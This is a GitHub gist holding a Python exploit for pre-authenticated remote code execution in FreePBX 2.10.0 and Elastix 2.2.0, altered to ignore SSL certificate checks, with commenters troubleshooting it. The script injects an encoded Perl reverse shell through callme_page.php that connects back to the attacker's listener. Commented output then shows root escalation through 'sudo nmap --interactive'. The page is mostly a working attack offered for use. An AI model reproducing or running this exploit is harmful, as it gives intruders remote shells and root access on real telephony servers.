Created
June 2, 2018 11:31
-
-
Save thel3l/a78c08272781130317d0bc73d1881d28 to your computer and use it in GitHub Desktop.
FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution - Fixed to avoid SSL errors.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
############################################################ | |
# Exploit Title: FreePBX / Elastix pre-authenticated remote code execution exploit | |
# Google Dork: oy vey | |
# Date: March 23rd, 2012 | |
# Author: muts | |
# Version: FreePBX 2.10.0/ 2.9.0, Elastix 2.2.0, possibly others. | |
# Tested on: multiple | |
# CVE : notyet | |
# Blog post : http://www.offensive-security.com/vulndev/freepbx-exploit-phone-home/ | |
# Archive Url : http://www.offensive-security.com/0day/freepbx_callmenum.py.txt | |
############################################################ | |
# Discovered by Martin Tschirsich | |
# http://seclists.org/fulldisclosure/2012/Mar/234 | |
# http://www.exploit-db.com/exploits/18649 | |
############################################################# | |
#import urllib | |
rhost="172.16.254.72" | |
lhost="172.16.254.223" | |
lport=4443 | |
extension="1000" | |
import urllib2 | |
import ssl | |
ctx = ssl.create_default_context() | |
ctx.check_hostname = False | |
ctx.verify_mode = ssl.CERT_NONE | |
# Reverse shell payload | |
url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A' | |
urllib2.urlopen(url, context=ctx) | |
# On Elastix, once we have a shell, we can escalate to root: | |
# root@bt:~# nc -lvp 443 | |
# listening on [any] 443 ... | |
# connect to [172.16.254.223] from voip [172.16.254.72] 43415 | |
# id | |
# uid=100(asterisk) gid=101(asterisk) | |
# sudo nmap --interactive | |
# Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ ) | |
# Welcome to Interactive Mode -- press h <enter> for help | |
# nmap> !sh | |
# id | |
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) |
in the newer versions of python, you have to replace line 32 to be:
urllib2.request.urlopen
Thanks for the reply. But you're wrong. urllib2.urlopen(url, context=ctx)
is correct. The extension="1000"
is the problem here.
The legacy urllib.urlopen function from Python 2.6 and earlier has been discontinued; urllib.request.urlopen() corresponds to the old urllib2.urlopen. Proxy handling, which was done by passing a dictionary parameter to urllib.urlopen, can be obtained by using ProxyHandler objects.
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
It is still not working
Error:-urllib2.URLError: <urlopen error [SSL: UNSUPPORTED_PROTOCOL] unsupported protocol (_ssl.c:727)>